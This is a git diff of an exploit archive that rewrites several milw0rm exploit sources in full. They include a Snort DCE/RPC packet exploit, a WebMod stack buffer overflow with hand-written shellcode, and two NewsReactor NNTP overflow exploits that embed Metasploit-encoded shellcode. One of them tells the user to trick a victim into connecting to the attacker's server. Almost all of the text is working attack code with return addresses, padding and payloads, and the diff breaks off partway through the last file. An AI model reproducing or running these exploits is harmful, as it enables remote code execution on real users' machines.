"\xda\xb9\x18\x0b\x23\xdf\xd7\x0a\x4e\xb2\xe1\x99\xca\xff\xe5\x8d" +payload += "\xcc\xd1\x80\xf5" + +payload += "\x90" # padding + +if len(sys.argv) != 2: + print "Usage snort_execute_dcerpc.py " + sys.exit(1) + +target = sys.argv[1] + +p = IP(dst=target) / TCP(sport=1025, dport=139, flags="PA") / payload +send(p) + +# milw0rm.com [2007-03-01] diff --git a/platforms/windows/remote/3395.c b/platforms/windows/remote/3395.c index 6b217c4bd..24840e411 100755 --- a/platforms/windows/remote/3395.c +++ b/platforms/windows/remote/3395.c 
@@ -1,184 +1,184 @@ -/* - * WebMod Stack Buffer Overflow - * - * by cybermind (Kevin Masterson) - * cybermind@gmail.com - * - * WebMod v0.48 exploit PoC code - * - */ -#include -#include -#include - -#define WIN32_LEAN_AND_MEAN -#include -#include -#pragma comment (lib, "ws2_32.lib") - -/* -local variables in connectHandle(): - -char *input; 4 -char buf[8192+1]; 8193 -int i,j; 8 -int connfd; 4 -int myid; 4 -threaddata_t *tdata; 4 -httpquery_t query; 149036 -char tmp[1025]; 1025 -int rcv; 4 -char clbuf[11]; 11 - -total: 158293 -actual (due to padding): 158308 - - - breakdown of types: - typedef struct s_var { 546 - char name[33]; 33 - char value[513]; 513 - } var_s; - - - typedef struct s_httpquery { 149036 - char method[11]; 11 - char clientip[16]; 16 - char url[257]; 257 - char *get; 4 - char *post; 4 - char *cookies; 4 - var_s vars[256]; 139776 - char currentmapname[257]; 257 - char sendcookies[8192+1]; 8193 - char contenttype[257]; 257 - char location[257]; 257 - } httpquery_t; -*/ - -//contains data to fill the Content-Length field with -char spambuf[20000]; - -//code to inject -//this particular code only works on Win2K SP4 (v5.0.4.0) -//and kernel32.dll v5.0.2195.6688 -unsigned char code[] = { - // ; push string onto the stack without using 0x00 - 0xB8, 0x59, 0x5A, 0x32, 0x11, //mov eax, 11325A59h ; "HI!\0" + 11111111h - 0x2D, 0x11, 0x11, 0x11, 0x11, //sub eax, 11111111h - 0x50, //push eax - 0x8B, 0xC4, //mov eax, esp ; eax points to string - - 0x33, 0xC9, //xor ecx, ecx ; zero - - // ; call MessageBox - 0x51, //push ecx ; flags (0) - 0x50, //push eax ; caption - 0x50, //push eax ; text - 0x51, //push ecx ; hwnd (0) - 0xB8, 0x98, 0x80, 0xE3, 0x77, //mov eax, 77E38098h ; &MessageBox - 0xFF, 0xD0, //call eax - - // ; call GetCurrentProcessId - 0xB8, 0xF4, 0xB8, 0x4E, 0x7C, //mov eax, 7C4EB8F4h ; &GetCurrentProcessId - 0xFF, 0xD0, //call eax - - 0x33, 0xC9, //xor ecx, ecx ; zero - - // ; call TerminateProcess - 0x51, //push ecx ; return code (0) - 0x50, //push 
eax ; process id - 0xB8, 0xC3, 0x8D, 0x51, 0x7C, //mov eax, 7C518DC3h ; &TerminateProcess - 0xFF, 0xD0 //call eax - -}; - -//EIP you want to insert, this points to an "FF E4" (jmp esp) in w_mm.dll -//set this to 0xFFFFFFFF to just cause a crash -unsigned int our_eip = 0x67E03C5B; - -int main(int argc, char* argv[]) { - WSADATA wsadata; - int sock = 0; - struct hostent* host = NULL; - struct sockaddr_in saddr; - - //data to sent initially - char initbuf[] = "POST / HTTP/1.1\nHost: localhost:27015\nContent-Length: "; - - //data to send after headers - char endbuf[] = "\n\n"; - - char* hostname = NULL; - short hostport = 27015; - - int i; - unsigned int sent = 0; - - //get host/port from command line - if (argc < 2) { - printf("Usage:\t%s [port=27015]\n", argv[0]); - return 1; - } - hostname = argv[1]; - if (argc >= 3) hostport = atoi(argv[2]); - - WSAStartup(MAKEWORD(1,1), &wsadata); - - sock = socket(AF_INET, SOCK_STREAM, 0); - if (sock <= 0) { - printf("socket() error\n"); - return 1; - } - - host = gethostbyname(hostname); - if (!host) { - printf("gethostbyname() error\n"); - return 1; - } - - printf("Resolved \"%s\" to %s\n", hostname, inet_ntoa(*(struct in_addr*)host->h_addr_list[0])); - - memset(&saddr, 0, sizeof(struct sockaddr_in)); - saddr.sin_family = AF_INET; - saddr.sin_port = htons(hostport); - memcpy(&saddr.sin_addr.s_addr, host->h_addr_list[0], host->h_length); - - if (connect(sock, (struct sockaddr*)&saddr, sizeof(struct sockaddr)) < 0) { - printf("connect() error\n"); - return 1; - } - - //initialize buffers - memset(spambuf, 'a', sizeof(spambuf)); - - //send initial POST request - sent += send(sock, initbuf, sizeof(initbuf)-1, 0); - - //send 7 full spambufs to get 140000 bytes - for (i = 0; i < 7; ++i) - sent += send(sock, spambuf, sizeof(spambuf), 0); - - //send partial spambuf to fill remaining data - //(18308, this goes right up to the EIP) - sent += send(sock, spambuf, 18308, 0); - - //fill EIP - sent += send(sock, (char*)&our_eip, 
sizeof(our_eip), 0); - - //insert code! - sent += send(sock, (char*)code, sizeof(code), 0); - - //send newlines after content-length - sent += send(sock, endbuf, sizeof(endbuf)-1, 0); - - printf("%u bytes sent...waiting...\n", sent); - - //wait for a while so the socket isn't closed on our end - //before they receive all the data - Sleep(15000); - - return 0; -} - -// milw0rm.com [2007-03-01] +/* + * WebMod Stack Buffer Overflow + * + * by cybermind (Kevin Masterson) + * cybermind@gmail.com + * + * WebMod v0.48 exploit PoC code + * + */ +#include +#include +#include + +#define WIN32_LEAN_AND_MEAN +#include +#include +#pragma comment (lib, "ws2_32.lib") + +/* +local variables in connectHandle(): + +char *input; 4 +char buf[8192+1]; 8193 +int i,j; 8 +int connfd; 4 +int myid; 4 +threaddata_t *tdata; 4 +httpquery_t query; 149036 +char tmp[1025]; 1025 +int rcv; 4 +char clbuf[11]; 11 + +total: 158293 +actual (due to padding): 158308 + + + breakdown of types: + typedef struct s_var { 546 + char name[33]; 33 + char value[513]; 513 + } var_s; + + + typedef struct s_httpquery { 149036 + char method[11]; 11 + char clientip[16]; 16 + char url[257]; 257 + char *get; 4 + char *post; 4 + char *cookies; 4 + var_s vars[256]; 139776 + char currentmapname[257]; 257 + char sendcookies[8192+1]; 8193 + char contenttype[257]; 257 + char location[257]; 257 + } httpquery_t; +*/ + +//contains data to fill the Content-Length field with +char spambuf[20000]; + +//code to inject +//this particular code only works on Win2K SP4 (v5.0.4.0) +//and kernel32.dll v5.0.2195.6688 +unsigned char code[] = { + // ; push string onto the stack without using 0x00 + 0xB8, 0x59, 0x5A, 0x32, 0x11, //mov eax, 11325A59h ; "HI!\0" + 11111111h + 0x2D, 0x11, 0x11, 0x11, 0x11, //sub eax, 11111111h + 0x50, //push eax + 0x8B, 0xC4, //mov eax, esp ; eax points to string + + 0x33, 0xC9, //xor ecx, ecx ; zero + + // ; call MessageBox + 0x51, //push ecx ; flags (0) + 0x50, //push eax ; caption + 0x50, //push eax ; text + 
0x51, //push ecx ; hwnd (0) + 0xB8, 0x98, 0x80, 0xE3, 0x77, //mov eax, 77E38098h ; &MessageBox + 0xFF, 0xD0, //call eax + + // ; call GetCurrentProcessId + 0xB8, 0xF4, 0xB8, 0x4E, 0x7C, //mov eax, 7C4EB8F4h ; &GetCurrentProcessId + 0xFF, 0xD0, //call eax + + 0x33, 0xC9, //xor ecx, ecx ; zero + + // ; call TerminateProcess + 0x51, //push ecx ; return code (0) + 0x50, //push eax ; process id + 0xB8, 0xC3, 0x8D, 0x51, 0x7C, //mov eax, 7C518DC3h ; &TerminateProcess + 0xFF, 0xD0 //call eax + +}; + +//EIP you want to insert, this points to an "FF E4" (jmp esp) in w_mm.dll +//set this to 0xFFFFFFFF to just cause a crash +unsigned int our_eip = 0x67E03C5B; + +int main(int argc, char* argv[]) { + WSADATA wsadata; + int sock = 0; + struct hostent* host = NULL; + struct sockaddr_in saddr; + + //data to sent initially + char initbuf[] = "POST / HTTP/1.1\nHost: localhost:27015\nContent-Length: "; + + //data to send after headers + char endbuf[] = "\n\n"; + + char* hostname = NULL; + short hostport = 27015; + + int i; + unsigned int sent = 0; + + //get host/port from command line + if (argc < 2) { + printf("Usage:\t%s [port=27015]\n", argv[0]); + return 1; + } + hostname = argv[1]; + if (argc >= 3) hostport = atoi(argv[2]); + + WSAStartup(MAKEWORD(1,1), &wsadata); + + sock = socket(AF_INET, SOCK_STREAM, 0); + if (sock <= 0) { + printf("socket() error\n"); + return 1; + } + + host = gethostbyname(hostname); + if (!host) { + printf("gethostbyname() error\n"); + return 1; + } + + printf("Resolved \"%s\" to %s\n", hostname, inet_ntoa(*(struct in_addr*)host->h_addr_list[0])); + + memset(&saddr, 0, sizeof(struct sockaddr_in)); + saddr.sin_family = AF_INET; + saddr.sin_port = htons(hostport); + memcpy(&saddr.sin_addr.s_addr, host->h_addr_list[0], host->h_length); + + if (connect(sock, (struct sockaddr*)&saddr, sizeof(struct sockaddr)) < 0) { + printf("connect() error\n"); + return 1; + } + + //initialize buffers + memset(spambuf, 'a', sizeof(spambuf)); + + //send initial POST request + 
sent += send(sock, initbuf, sizeof(initbuf)-1, 0); + + //send 7 full spambufs to get 140000 bytes + for (i = 0; i < 7; ++i) + sent += send(sock, spambuf, sizeof(spambuf), 0); + + //send partial spambuf to fill remaining data + //(18308, this goes right up to the EIP) + sent += send(sock, spambuf, 18308, 0); + + //fill EIP + sent += send(sock, (char*)&our_eip, sizeof(our_eip), 0); + + //insert code! + sent += send(sock, (char*)code, sizeof(code), 0); + + //send newlines after content-length + sent += send(sock, endbuf, sizeof(endbuf)-1, 0); + + printf("%u bytes sent...waiting...\n", sent); + + //wait for a while so the socket isn't closed on our end + //before they receive all the data + Sleep(15000); + + return 0; +} + +// milw0rm.com [2007-03-01] diff --git a/platforms/windows/remote/3462.cpp b/platforms/windows/remote/3462.cpp index 4feab277d..58b423e22 100755 --- a/platforms/windows/remote/3462.cpp +++ b/platforms/windows/remote/3462.cpp 
@@ -1,180 +1,180 @@ -/******************************************************************************** -* NewsReactor 20070220 Article Grabbing Remote Buffer Overflow * -* Exploit 1 * -* * -* * -* There is remote buffer overflow in NewsReactor 20070220 that can be triggered * -* by grabbing articles that contain an overly long file name. * -* * -* To exploit, convince someone to set his newsgroup server to your ip:119 and * -* ask him to grab an article (say with a .NZB file). * -* * -* This exploit waits for incoming connection and then runs calc.exe. * -* * -* Return address should work on XP SP2 FR. * -* Should fail on english systems cause I took the first return address I got =D.* -* Have Fun! * -* * -* Tested against WIN XP SP2 FR * -* Coded and Discovered by Marsu * -********************************************************************************/ - - - -#include "winsock2.h" -#include "stdio.h" -#include "time.h" -#include "stdlib.h" -#pragma comment(lib, "ws2_32.lib") - -/* win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com */ -/* 0x00 0x0b 0x0c 0x0a 0x0d 0x0e 0x0f 0x09 0x20 0x22 0x7C */ -char calcshellcode[] = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" -"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x53\x4b\x58\x4e\x37" -"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48" -"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x58" -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" -"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x58" -"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44" 
-"\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x48" -"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x43" -"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x47" -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a" -"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b" -"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x56\x4e\x53\x4f\x35\x41\x53" -"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37" -"\x42\x35\x4a\x56\x50\x47\x4a\x4d\x44\x4e\x43\x57\x4a\x56\x4a\x59" -"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56" -"\x4e\x56\x43\x36\x50\x42\x45\x56\x4a\x47\x45\x36\x42\x30\x5a"; - - - -int main(int argc, char* argv[]) -{ - char recvbuff[1024]; - char evilbuff[10000]; - sockaddr_in sin; - int server,client; - WSADATA wsaData; - WSAStartup(MAKEWORD(1,1), &wsaData); - - server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); - sin.sin_family = PF_INET; - sin.sin_addr.s_addr = htonl(INADDR_ANY); - sin.sin_port = htons( 119 ); - bind(server,(SOCKADDR*)&sin,sizeof(sin)); - printf("[+] NewsReactor Article Grabbing Remote Buffer Overflow\n"); - printf("[+] Coded and Discovered by Marsu \n"); - printf("[*] Listening on port 119...\n"); - listen(server,5); - printf("[*] Waiting for client ...\n"); - client=accept(server,NULL,NULL); - printf("[+] Client connected\n"); - - if (send(client,"200 Hello there\r\n",17,0)==-1) - { - printf("[-] Error in send!\n"); - exit(-1); - } - - //BODY article or AUTHINFO user - memset(recvbuff,0,1024); - recv(client,recvbuff,1024,0); - printf("-> %s\n",recvbuff); - if (strstr(recvbuff,"AUTHINFO")) { - send(client,"381 Pass please?\r\n",18,0); - - //authinfo pass - memset(recvbuff,0,1024); - recv(client,recvbuff,1024,0); - printf("-> %s\n",recvbuff); - send(client,"281 Pleased to meet you\r\n",25,0); - - //BODY article - memset(recvbuff,0,1024); - recv(client,recvbuff,1024,0); - printf("-> %s\n",recvbuff); - } - - char* postname=(char *) 
malloc(strlen(recvbuff)*sizeof(char)); - memset(postname,0,100); - if (!strstr(recvbuff,"BODY")) { - printf("[-] BODY were expected. Exploit will fail.\n"); - } - else { - memcpy(postname,recvbuff+5,strlen(recvbuff)-5); - printf("[+] Using %s to exploit.\n",postname); - } - -char header[]="220 0 "; -char header2[]= -" article\r\n" -"=ybegin part=1 line=128 size=127 name=" -"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"AAAAAAAAAAAAAAAAAAAAAAA" -"\xD6\xE6\xE3\x77" //jmp EDI in advapi32.dll XP SP2 FR. -"\xD6\xE6\xE3\x77" //ugly but we don't know where we land... -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"\xD6\xE6\xE3\x77" -"AAAAAAAA" -"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"AAAAAAAA"; - -char end[]= -"\r\n" -"=ypart begin=1 end=127\r\n" -"BLABLABLA\r\n" -"=yend size=127 part=1 pcrc32=d4f19f0f\r\n" -".\r\n\0"; - - memset(evilbuff,'A',10000); - memcpy(evilbuff,header,strlen(header)); - memcpy(evilbuff+strlen(header),postname,strlen(postname)); - memcpy(evilbuff+strlen(header)+strlen(postname),header2,strlen(header2)); - memcpy(evilbuff+strlen(header)+strlen(postname)+strlen(header2),calcshellcode,strlen(calcshellcode)); - memcpy(evilbuff+strlen(header)+strlen(postname)+strlen(header2)+strlen(calcshellcode)+70,end,strlen(end)); - send(client,evilbuff,strlen(evilbuff),0); - - printf("[+] 
Evil data sent. Have fun!\n"); - Sleep(500); - return 0; - -} - -// milw0rm.com [2007-03-12] +/******************************************************************************** +* NewsReactor 20070220 Article Grabbing Remote Buffer Overflow * +* Exploit 1 * +* * +* * +* There is remote buffer overflow in NewsReactor 20070220 that can be triggered * +* by grabbing articles that contain an overly long file name. * +* * +* To exploit, convince someone to set his newsgroup server to your ip:119 and * +* ask him to grab an article (say with a .NZB file). * +* * +* This exploit waits for incoming connection and then runs calc.exe. * +* * +* Return address should work on XP SP2 FR. * +* Should fail on english systems cause I took the first return address I got =D.* +* Have Fun! * +* * +* Tested against WIN XP SP2 FR * +* Coded and Discovered by Marsu * +********************************************************************************/ + + + +#include "winsock2.h" +#include "stdio.h" +#include "time.h" +#include "stdlib.h" +#pragma comment(lib, "ws2_32.lib") + +/* win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com */ +/* 0x00 0x0b 0x0c 0x0a 0x0d 0x0e 0x0f 0x09 0x20 0x22 0x7C */ +char calcshellcode[] = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" +"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x53\x4b\x58\x4e\x37" +"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48" +"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x58" +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" +"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" 
+"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x58"
+"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
+"\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x48"
+"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x43"
+"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x47"
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
+"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
+"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x56\x4e\x53\x4f\x35\x41\x53"
+"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
+"\x42\x35\x4a\x56\x50\x47\x4a\x4d\x44\x4e\x43\x57\x4a\x56\x4a\x59"
+"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56"
+"\x4e\x56\x43\x36\x50\x42\x45\x56\x4a\x47\x45\x36\x42\x30\x5a";
+
+
+
+int main(int argc, char* argv[])
+{
+ char recvbuff[1024];
+ char evilbuff[10000];
+ sockaddr_in sin;
+ int server,client;
+ WSADATA wsaData;
+ WSAStartup(MAKEWORD(1,1), &wsaData);
+
+ server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
+ sin.sin_family = PF_INET;
+ sin.sin_addr.s_addr = htonl(INADDR_ANY);
+ sin.sin_port = htons( 119 );
+ bind(server,(SOCKADDR*)&sin,sizeof(sin));
+ printf("[+] NewsReactor Article Grabbing Remote Buffer Overflow\n");
+ printf("[+] Coded and Discovered by Marsu \n");
+ printf("[*] Listening on port 119...\n");
+ listen(server,5);
+ printf("[*] Waiting for client ...\n");
+ client=accept(server,NULL,NULL);
+ printf("[+] Client connected\n");
+
+ if (send(client,"200 Hello there\r\n",17,0)==-1)
+ {
+ printf("[-] Error in send!\n");
+ exit(-1);
+ }
+
+ //BODY article or AUTHINFO user
+ memset(recvbuff,0,1024);
+ recv(client,recvbuff,1024,0);
+ printf("-> %s\n",recvbuff);
+ if (strstr(recvbuff,"AUTHINFO")) {
+ send(client,"381 Pass please?\r\n",18,0);
+
+ //authinfo pass
+ memset(recvbuff,0,1024);
+ recv(client,recvbuff,1024,0);
+ printf("-> %s\n",recvbuff);
+ send(client,"281 Pleased to meet you\r\n",25,0);
+
+ //BODY article
+ memset(recvbuff,0,1024);
+ recv(client,recvbuff,1024,0);
+ printf("-> %s\n",recvbuff);
+ }
+
+ char* postname=(char *) malloc(strlen(recvbuff)*sizeof(char));
+ memset(postname,0,100);
+ if (!strstr(recvbuff,"BODY")) {
+ printf("[-] BODY were expected. Exploit will fail.\n");
+ }
+ else {
+ memcpy(postname,recvbuff+5,strlen(recvbuff)-5);
+ printf("[+] Using %s to exploit.\n",postname);
+ }
+
+char header[]="220 0 ";
+char header2[]=
+" article\r\n"
+"=ybegin part=1 line=128 size=127 name="
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAA"
+"\xD6\xE6\xE3\x77" //jmp EDI in advapi32.dll XP SP2 FR.
+"\xD6\xE6\xE3\x77" //ugly but we don't know where we land...
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"\xD6\xE6\xE3\x77"
+"AAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
+"AAAAAAAA";
+
+char end[]=
+"\r\n"
+"=ypart begin=1 end=127\r\n"
+"BLABLABLA\r\n"
+"=yend size=127 part=1 pcrc32=d4f19f0f\r\n"
+".\r\n\0";
+
+ memset(evilbuff,'A',10000);
+ memcpy(evilbuff,header,strlen(header));
+ memcpy(evilbuff+strlen(header),postname,strlen(postname));
+ memcpy(evilbuff+strlen(header)+strlen(postname),header2,strlen(header2));
+ memcpy(evilbuff+strlen(header)+strlen(postname)+strlen(header2),calcshellcode,strlen(calcshellcode));
+ memcpy(evilbuff+strlen(header)+strlen(postname)+strlen(header2)+strlen(calcshellcode)+70,end,strlen(end));
+ send(client,evilbuff,strlen(evilbuff),0);
+
+ printf("[+] Evil data sent. Have fun!\n");
+ Sleep(500);
+ return 0;
+
+}
+
+// milw0rm.com [2007-03-12]
diff --git a/platforms/windows/remote/3463.cpp b/platforms/windows/remote/3463.cpp
index ab7f5c192..1fa7c4a78 100755
--- a/platforms/windows/remote/3463.cpp
+++ b/platforms/windows/remote/3463.cpp
@@ -1,230 +1,230 @@
-/*********************************************************************************
-* NewsReactor 20070220 Article Grabbing Remote Buffer Overflow *
-* Exploit 2 *
-* *
-* *
-* Check the other advisory for technical details. *
-* *
-* This exploit connects to your newsgroups provider and posts a crafted article. *
-* *
-* Ask your victim to grab it to trigger the bug and execute calc.exe. *
-* Return address should work on XP SP2 FR. *
-* Should fail on english systems cause I took the first return address I got =D. *
-* Have Fun! *
-* *
-* Tested against WIN XP SP2 FR *
-* Coded and Discovered by Marsu *
-* *
-* Note: change evilbuff to crash News Bin Pro 4.32. 800 'A' should be enough. *
-*********************************************************************************/
-
-
-#include "winsock2.h"
-#include "stdio.h"
-#include "stdlib.h"
-#pragma comment(lib, "ws2_32.lib")
-
-
-/* win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com */
-/* 0x00 0x0b 0x0c 0x0a 0x0d 0x0e 0x0f 0x09 0x20 0x22 0x7C */
-char calcshellcode[] =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x53\x4b\x58\x4e\x37"
-"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x34\x4a\x51\x4b\x48"
-"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x58"
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
-"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x58"
-"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
-"\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x48"
-"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x43"
-"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x47"
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
-"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
-"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x56\x4e\x53\x4f\x35\x41\x53"
-"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
-"\x42\x35\x4a\x56\x50\x47\x4a\x4d\x44\x4e\x43\x57\x4a\x56\x4a\x59"
-"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56"
-"\x4e\x56\x43\x36\x50\x42\x45\x56\x4a\x47\x45\x36\x42\x30\x5a";
-
-int main(int argc, char* argv[])
-{
- struct hostent *he;
- struct sockaddr_in sock_addr;
- WSADATA wsa;
- int nntpsock;
- char recvbuff[500];
- char buffer[100];
- char authuser[]="AUTHINFO USER %s\r\n";
- char authpass[]="AUTHINFO PASS %s\r\n";
- char evilbuff[10000];
- char *user=0,*pass=0,*subject,*group,*author;
- int i=2;
-
- WSACleanup();
- WSAStartup(MAKEWORD(2,0),&wsa);
-
- if (argc<5) {
- printf("[+] NewsReactor Article Grabbing Remote Buffer Overflow\n");
- printf("[+] Coded and Discovered by Marsu \n");
- printf("[+] Usage: %s Newsserver [-u User] [-p Pass] Group Subject Author\n",argv[0]);
